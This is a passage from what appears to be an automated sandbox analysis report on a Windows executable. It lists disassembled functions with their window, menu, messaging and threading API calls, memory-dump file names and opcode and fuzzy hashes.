                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2354583917-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenu.USER32 ref: 004776AA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0047771A
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1823500076-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 896007046-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(009B1A80,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(009B1A80,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 004484C4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0044857B
                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                                                                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3866635326-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0vH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 327565842-3662162768
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 00448B1C
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3429747543-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %lu$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3164766367-3924996404
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3636473452
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00415743
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00415750
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                                                                                                                                                                                                                                                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                                                                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 004157A9
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1269668773-0
